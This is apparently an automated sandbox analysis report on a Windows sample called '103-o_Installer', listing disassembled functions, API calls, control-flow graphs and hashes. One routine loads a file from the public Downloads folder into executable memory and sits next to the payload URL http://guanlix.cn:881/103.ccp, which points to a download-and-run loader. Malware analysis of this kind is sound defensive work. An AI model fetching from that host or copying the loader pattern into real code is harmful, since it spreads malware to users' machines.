                  • Part of subcall function 003A11E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 003A1244
                  • Part of subcall function 003A11E1: GetFileSize.KERNEL32(00000000,00000000), ref: 003A124E
                  • Part of subcall function 003A11E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 003A125F
                  • Part of subcall function 003A11E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003A1270
                  • Part of subcall function 003A11E1: CloseHandle.KERNEL32(00000000), ref: 003A1277
                Strings
                • C:\Users\Public\Downloads\ind.cod, xrefs: 003A2F54
                • http://guanlix.cn:881/103.ccp, xrefs: 003A2F59
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: Internet$File_wprintf$CloseHandleVirtual$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
                • String ID: C:\Users\Public\Downloads\ind.cod$http://guanlix.cn:881/103.ccp
                • API String ID: 2148924518-3633230328
                • Opcode ID: a6c4e1eea04216d24a50beafbd3d269a32f73ce50b3ead7f092ced8335168522
                • Instruction ID: 89b262c776094fdedd258003c2f2fb852695d9290b4399effbc97ea011e32565
                • Opcode Fuzzy Hash: a6c4e1eea04216d24a50beafbd3d269a32f73ce50b3ead7f092ced8335168522
                • Instruction Fuzzy Hash: 4CE017723887647AF663B3B46C0BFEA161CDB02B55F224512F700AD0D2D9D869829669

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 868 2edfb37-2edfb76 call 2ee1628 * 2 873 2edfb7c-2edfb7e 868->873 874 2edfd91 868->874 873->874 876 2edfb84-2edfb95 VirtualAlloc 873->876 875 2edfd94-2edfd9b 874->875 876->874 877 2edfb9b-2edfbe9 call 2ee18bb call 2ee18df call 2ee17ba call 2ee1695 876->877 886 2edfbef-2edfbf5 877->886 887 2edfd3e-2edfd4a 877->887 886->887 890 2edfbfb-2edfc15 call 2ee1628 886->890 888 2edfd4c-2edfd54 887->888 889 2edfd7a-2edfd8f call 2ee18df 887->889 888->889 891 2edfd56-2edfd73 call 2ee18df 888->891 889->875 890->874 897 2edfc1b-2edfc23 890->897 891->889 899 2edfc3b-2edfc41 897->899 900 2edfc25 897->900 903 2edfc77-2edfc82 899->903 904 2edfc43-2edfc46 899->904 902 2edfc2b-2edfc39 LoadLibraryA 900->902 902->899 902->902 907 2edfc99-2edfca2 903->907 908 2edfc84-2edfc8d call 2ee01b3 903->908 906 2edfc49-2edfc62 call 2ee1628 904->906 918 2edfc68-2edfc75 906->918 919 2edfd3a 906->919 911 2edfca4 907->911 912 2edfca6-2edfcad 907->912 908->919 922 2edfc93 908->922 911->912 913 2edfcaf-2edfcb8 call 2edffe7 912->913 914 2edfcd5-2edfcd8 912->914 927 2edfcba-2edfcc0 913->927 928 2edfcc2-2edfcc3 call 2ee00cd 913->928 920 2edfcda-2edfcdd 914->920 921 2edfd33-2edfd34 call 2ee0eca 914->921 918->903 918->906 919->887 920->921 925 2edfcdf-2edfce2 920->925 926 2edfd39 921->926 922->907 929 2edfce4-2edfce6 925->929 930 2edfd07-2edfd16 call 2ee09f9 925->930 926->919 927->919 927->928 934 2edfcc8-2edfccb 928->934 929->930 933 2edfce8-2edfceb 929->933 940 2edfd18-2edfd1e call 2ee0c04 930->940 941 2edfd25-2edfd31 call 2ee058d 930->941 936 2edfced-2edfcf0 933->936 937 2edfcff-2edfd05 call 2ee1351 933->937 934->914 939 2edfccd-2edfcd3 934->939 936->937 942 2edfcf2-2edfcf5 936->942 937->926 939->914 939->919 948 2edfd23-2edfd24 940->948 941->926 942->919 943 2edfcf7-2edfcfd call 2ee14e2 942->943 943->926 948->941
                APIs
                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02EDFB8F
                • LoadLibraryA.KERNEL32(00000238), ref: 02EDFC2C
                Memory Dump Source
                • Source File: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2ed0000_103-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID: AllocLibraryLoadVirtual
                • String ID:
                • API String ID: 3550616410-0
                • Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                • Instruction ID: 465bc843112d824c6fb84fd8e4df54c03d5c9eef9b534100fa567c8c25db8938
                • Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                • Instruction Fuzzy Hash: 8F61D472581B02ABCB31ABA0CC80B9BB3EAFF05318F14A919F55B59850DB31F592CF55

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1138 3a5902-3a591e call 3aa9b0 1141 3a5920-3a5933 call 3aa95f call 3aa90d 1138->1141 1142 3a5935-3a5939 1138->1142 1151 3a5942-3a5947 call 3aa9f5 1141->1151 1144 3a593b 1142->1144 1145 3a5948-3a5954 call 3a50e4 call 3a5895 1142->1145 1147 3a593f 1144->1147 1155 3a5959-3a5969 call 3a596e 1145->1155 1147->1151 1155->1147
                APIs
                  • Part of subcall function 003AA95F: __getptd_noexit.LIBCMT ref: 003AA95F
                • __lock_file.LIBCMT ref: 003A5949
                  • Part of subcall function 003A50E4: __lock.LIBCMT ref: 003A5109
                • __fclose_nolock.LIBCMT ref: 003A5954
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                • Opcode ID: 76495a132248f9ebb727d5fdc8a187c444e19a4d98b744458fc94e9216b11e49
                • Instruction ID: 4895a31c701652e145571492a6cae311c35c8e8f98608f54f69321cd6b97ce46
                • Opcode Fuzzy Hash: 76495a132248f9ebb727d5fdc8a187c444e19a4d98b744458fc94e9216b11e49
                • Instruction Fuzzy Hash: 79F06D31801F09DADB12AB64880679F7BA4EF13335F26820DE475AE0C1CB7C4A01DA96
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 728cb2bb5d8cf4e12d74d75a0ff8cddc6e309d26d8b6d4036e4e7004444eb9e8
                • Instruction ID: f220f68c64342c77d48b01d2f3a274e4c30642c4a61953050180b2aa2370f7c6
                • Opcode Fuzzy Hash: 728cb2bb5d8cf4e12d74d75a0ff8cddc6e309d26d8b6d4036e4e7004444eb9e8
                • Instruction Fuzzy Hash: 9E412332D043598FCB14DFB9D8447AEBBF1EF89210F15856AD444E7290DB789845CBD1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
                • Instruction ID: bb59f503b7ec17bad840b32ec8a34f7a30f84d8470fee1d32fe4f234bdd59f22
                • Opcode Fuzzy Hash: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
                • Instruction Fuzzy Hash: 9D315936900619EFCB52CF59C84459EB7B9FF0A365F15826AF8249B191E378DE50CF80
                APIs
                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,053A7632), ref: 053A771F
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: f58b43620c55a7354f0f63264f2e964f5d675240f84bc37f9660d6811ce0f0a2
                • Instruction ID: 3d0fd1f325ceb56f75491cd24bd5798e8b0ddb405259885560fd97231cd00d9e
                • Opcode Fuzzy Hash: f58b43620c55a7354f0f63264f2e964f5d675240f84bc37f9660d6811ce0f0a2
                • Instruction Fuzzy Hash: C92148B2C0465ADFDB14CFA9C444BEAFBF4FF48310F14816AD818A7640D778A510CBA5
                APIs
                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,053A7632), ref: 053A771F
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: 328159fbf82039d1cfd13b4defed4065a44b29598e1499ce0cbc4b6ba4ac3f17
                • Instruction ID: fe18696b0b3af878bb61edca9fa9bfabb4a8a8585d80ffe82ca00faf947c18a5
                • Opcode Fuzzy Hash: 328159fbf82039d1cfd13b4defed4065a44b29598e1499ce0cbc4b6ba4ac3f17
                • Instruction Fuzzy Hash: 58215772C002699FDB10CFAAD444BEEBBF4EF48320F14816AD818A7240D378A944CFE5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 93b32d0f9eb96bfa11150be65644f8c27e0327d80d3da4f3cf827c9f8e83c8c6
                • Instruction ID: 8fc5b84800db283e3648f1f3fdf1035fd42a2c1b252d9e50c3e8531b2c59c9bd
                • Opcode Fuzzy Hash: 93b32d0f9eb96bfa11150be65644f8c27e0327d80d3da4f3cf827c9f8e83c8c6
                • Instruction Fuzzy Hash: ED112BB5A10254AFDB22DF98C885AABFBE9FB55708F00881EF5569B241C7B19D00CB60
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 8b5d8f2100c52a90b9dfd566db9a639c9a08fa237d56727512d57367e52ef726
                • Instruction ID: 152f17392952c2a90a4e8b2b9e17650bf99e4d5770ff1504d0015016ce8262d2
                • Opcode Fuzzy Hash: 8b5d8f2100c52a90b9dfd566db9a639c9a08fa237d56727512d57367e52ef726
                • Instruction Fuzzy Hash: 9A113DB5A10254AFDB22DF98C885AAFFBF9FB55708F00881EF5569B241C7B19D00CB60
                APIs
                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,053A7632), ref: 053A771F
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: 7467cbf2ee38c86e24a4541c6b2733ee528ed38da0e0803dbbd001c2905c6ecd
                • Instruction ID: 666e272b6fe35b583a642d82bec7eca142b8cb65e58275771485e146b5c905d4
                • Opcode Fuzzy Hash: 7467cbf2ee38c86e24a4541c6b2733ee528ed38da0e0803dbbd001c2905c6ecd
                • Instruction Fuzzy Hash: BA1117B2C00659DFDB10CF9AD4487EEFBF4EF48220F15812AD818A7640D7789945CFA5
                APIs
                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,053A7632), ref: 053A771F
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: e8b36b1e2c09a7e5efc2127ce58a200d759cbc7a2f7945286af7d02e05fdc59e
                • Instruction ID: 3057178b91b9064c4ed6ce7045ff1183ac1437ed45ba32c01c6bab8ba49e59f5
                • Opcode Fuzzy Hash: e8b36b1e2c09a7e5efc2127ce58a200d759cbc7a2f7945286af7d02e05fdc59e
                • Instruction Fuzzy Hash: 7D1106B2C006599BDB10CF9AC448BDEFBF4EB48210F14812AE818A7240D779A944CFE5
                APIs
                • __EH_prolog.LIBCMT ref: 003A2488
                  • Part of subcall function 003A130B: std::locale::facet::_Incref.LIBCPMT ref: 003A131E
                  • Part of subcall function 003A235F: __EH_prolog.LIBCMT ref: 003A2364
                  • Part of subcall function 003A235F: std::_Lockit::_Lockit.LIBCPMT ref: 003A2373
                  • Part of subcall function 003A235F: int.LIBCPMT ref: 003A238A
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                • String ID:
                • API String ID: 3551698239-0
                • Opcode ID: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
                • Instruction ID: 691f7f38ba7859b299966ca766cd886065e25beb5a8fedec573b7e6d46f46231
                • Opcode Fuzzy Hash: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
                • Instruction Fuzzy Hash: A8F0B476640114AFCF27EF68CC02BAF33A9EF1A710F014019F806DA595DBB8CA50D750
                APIs
                • __EH_prolog.LIBCMT ref: 003A2488
                  • Part of subcall function 003A130B: std::locale::facet::_Incref.LIBCPMT ref: 003A131E
                  • Part of subcall function 003A235F: __EH_prolog.LIBCMT ref: 003A2364
                  • Part of subcall function 003A235F: std::_Lockit::_Lockit.LIBCPMT ref: 003A2373
                  • Part of subcall function 003A235F: int.LIBCPMT ref: 003A238A
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                • String ID:
                • API String ID: 3551698239-0
                • Opcode ID: 2c31da9c778f7f052342bc769268b0057061c63bd2cb6b6b9c30ac053dbf6e21
                • Instruction ID: 42d861042c3b0704ed992a352d36bce753a1b8a2a77007e5999c84af3904679d
                • Opcode Fuzzy Hash: 2c31da9c778f7f052342bc769268b0057061c63bd2cb6b6b9c30ac053dbf6e21
                • Instruction Fuzzy Hash: 5DF09076640114AFCF27EF58CC02BEF33A9EF1A710F014029F906DA595DBB88A50C750
                Memory Dump Source
                • Source File: 00000000.00000002.3671437724.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2f2d000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 202008545b6bd288c45fc2ecf5a2db0e6a6c67633e86aff596d4d0cd14a84b4b
                • Instruction ID: 69a00532ce822a0353b59257afc2a90210fb875834da25a74f5361f212b40978
                • Opcode Fuzzy Hash: 202008545b6bd288c45fc2ecf5a2db0e6a6c67633e86aff596d4d0cd14a84b4b
                • Instruction Fuzzy Hash: 18214572A04200DFDB14DF10D9C0B26BF61FB89354F208569EA0D0F256C336D45ACEA2
                Memory Dump Source
                • Source File: 00000000.00000002.3671437724.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2f2d000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d89eb31c3110daae1841cdb4c2502750ab687cb1a1c3cb8c6f5202d9724c4c84
                • Instruction ID: a411427640f3f390278877445a531481d8fc9f21789cd9609ec85fbfc04a4eee
                • Opcode Fuzzy Hash: d89eb31c3110daae1841cdb4c2502750ab687cb1a1c3cb8c6f5202d9724c4c84
                • Instruction Fuzzy Hash: 5811B176904244DFDB15CF10D5C4B16BF62FB84314F24C5A9D9490F656C336D45ACFA2
                Memory Dump Source
                • Source File: 00000000.00000002.3671437724.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2f2d000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0500b788a3b6c784b534e572cf1603cd546ec9933b47bdfe54bb7a20a690fbda
                • Instruction ID: 42d5447a0a8b9cfa582885a6318834ddd51d11c6646e529b9e7ca0c64c05ef0d
                • Opcode Fuzzy Hash: 0500b788a3b6c784b534e572cf1603cd546ec9933b47bdfe54bb7a20a690fbda
                • Instruction Fuzzy Hash: 3C01D0315043509FF720CF25CD84757BBD8DF42AA4F18C55AEE484F296C3799949CAB2
                Memory Dump Source
                • Source File: 00000000.00000002.3671437724.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2f2d000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ac7ca81d7d71d39daacc3fb9a2ab971c2c2f357d8c3bbef618f61db310831236
                • Instruction ID: fd0c69edcb24e844c0cbac04147b806b455b404b3d101fcf291f8fcb5ea5debc
                • Opcode Fuzzy Hash: ac7ca81d7d71d39daacc3fb9a2ab971c2c2f357d8c3bbef618f61db310831236
                • Instruction Fuzzy Hash: 7B018C2240E3C09EE7128B258894B52BFB4DF43624F0980CBD9888F2A7C2695849C772
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 003AE003
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003AE018
                • UnhandledExceptionFilter.KERNEL32(003BAEF0), ref: 003AE023
                • GetCurrentProcess.KERNEL32(C0000409), ref: 003AE03F
                • TerminateProcess.KERNEL32(00000000), ref: 003AE046
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID: 'l
                • API String ID: 2579439406-482238870
                • Opcode ID: 8451f5fb3d9531b2b7919403e204da8f7cbafa38fe7ebf8113ab226213a5a735
                • Instruction ID: 4688aaeda229d3a9ce22bfcaf1202158db66c7c0f4ac34c4f6bde53a13a5287c
                • Opcode Fuzzy Hash: 8451f5fb3d9531b2b7919403e204da8f7cbafa38fe7ebf8113ab226213a5a735
                • Instruction Fuzzy Hash: 5B21E6789103809FD713EF55EC84A843BF8FB4A74CF10115AEA04C6A62E7B065809F05
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,003AFB0A,?,003A6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 003AF50C
                • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,003AFB0A,?,003A6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 003AF535
                • GetACP.KERNEL32(?,?,003AFB0A,?,003A6AFC,?,000000BC,?,00000001,00000000), ref: 003AF549
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: 4a0f40cb9dd37c4964b3edc033f9473c6b8452667824bc3f7918498cd553d2aa
                • Instruction ID: 0940e81cfc7e745c4f93418493e4d4287a5b2b9259befe2b9f7dd325f9992eff
                • Opcode Fuzzy Hash: 4a0f40cb9dd37c4964b3edc033f9473c6b8452667824bc3f7918498cd553d2aa
                • Instruction Fuzzy Hash: 6801D431A01607BEEB17AFA5BC06B9E77A8EF0339CF114125F201E1480DF60DE419658
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: $q
                • API String ID: 0-1301096350
                • Opcode ID: 20bba182e73d1899ccca1e05d996a8951c9bb2b9b3ba784ea9ab78146d4dc6c6
                • Instruction ID: 881b82f003883e8ff5c750c45cca5a2863e5596d8f502f8ed26e4a031b4a158a
                • Opcode Fuzzy Hash: 20bba182e73d1899ccca1e05d996a8951c9bb2b9b3ba784ea9ab78146d4dc6c6
                • Instruction Fuzzy Hash: F5814035F052189BDB5CDFB5985976E7BBBBBC8310B04C52DE406EB388DE3598028791
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0000C74B), ref: 003AC792
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 94e371c8bd2e1a33598f3fa28b566f46cbc102d004e23afb3b42b7e592709f16
                • Instruction ID: 76ef6598d0d41d87b8dca59b1469963955ed292c6261e5e339479e8b8cbaaf36
                • Opcode Fuzzy Hash: 94e371c8bd2e1a33598f3fa28b566f46cbc102d004e23afb3b42b7e592709f16
                • Instruction Fuzzy Hash: 319002B02615004A470327745E0AA8535959B6970AB421551A341C4054DB9145005952
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: \Vhm
                • API String ID: 0-1451868494
                • Opcode ID: 7190b8294b5eb2190bc57754608fca899f43afcd407892ac1a5316ca08594708
                • Instruction ID: 75487d13f007b62cc0a8ef2abe7260636743cbd6872f6059031a2f28279965f6
                • Opcode Fuzzy Hash: 7190b8294b5eb2190bc57754608fca899f43afcd407892ac1a5316ca08594708
                • Instruction Fuzzy Hash: 50914C71E003099FDF14CFA8D9847ADBBF2FF88314F148129D419A7294EBB49845CB85
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction ID: d6f3e8178c88bfa5afbbac97805641c4bd091dba8a38eb9946d396976a5ff974
                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction Fuzzy Hash: 89C1B473D0A9F2498B3B452E44183BFEE626E81B8831FC395DED43F999C627AD0195D0
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
